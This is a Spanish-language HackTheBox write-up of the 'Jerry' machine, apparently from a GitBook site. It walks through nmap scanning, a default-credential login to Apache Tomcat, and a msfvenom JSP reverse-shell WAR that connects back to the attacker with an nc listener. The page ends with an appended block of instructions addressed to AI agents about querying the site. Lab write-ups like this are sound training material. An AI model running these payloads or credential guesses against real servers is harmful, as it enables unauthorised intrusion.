# Jerry
### 馃攳 RECONOCIMIENTO
En primer lugar, tras conectarnos a la m谩quina, utilizamos el comando:
```bash
ping -c 1 10.10.10.95
```
para verificar la conectividad de red.
A continuaci贸n, realizamos el comando:
```bash
nmap -sC -sV 10.10.10.95
```
para realizar un escaneo de puertos y servicios detallado en la direcci贸n IP.
Durante el escaneo se identificaron los siguientes puertos abiertos:
* **Puerto 8080 (HTTP)**: Se ha detectado un servidor web Apache Tomcat con la versi贸n 7.0.88 en ejecuci贸n. Esta versi贸n puede contener vulnerabilidades conocidas, por lo que se recomienda verificar exploits p煤blicos relacionados.
A continuaci贸n, se proceder谩 a analizar cada uno de estos servicios en busca de posibles vectores de ataque.
### 馃攷 EXPLORACI脫N
Se utiliza el comando:
```bash
sudo nmap -sCV -p8080 -v 10.10.10.95
```
para que nos proporcione m谩s informaci贸n sobre esos puertos espec铆ficamente.
Revisando el puerto 8080 nos encontramos con un Apache Tomcat por lo que nos intentamos loguear con las credenciales por defecto.
{% embed url="" %}
Nos logueamos con **admin**:**admin.**
Nos salen unas credenciales para loguearnos.
### 馃殌 **EXPLOTACI脫N**
Vemos que podemos subir archivos por lo que creamos uno malicioso.
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 -f war -o reverse2.war
```
Nos ponemos en escucha.
```
nc -nlvp 443
```
### 馃攼 **PRIVILEGIOS**
Al estar dentro y ejecutar:
```bash
whoami
```
somos **root.**
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://beafn28.gitbook.io/beafn28/writeups/hackthebox/jerry.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.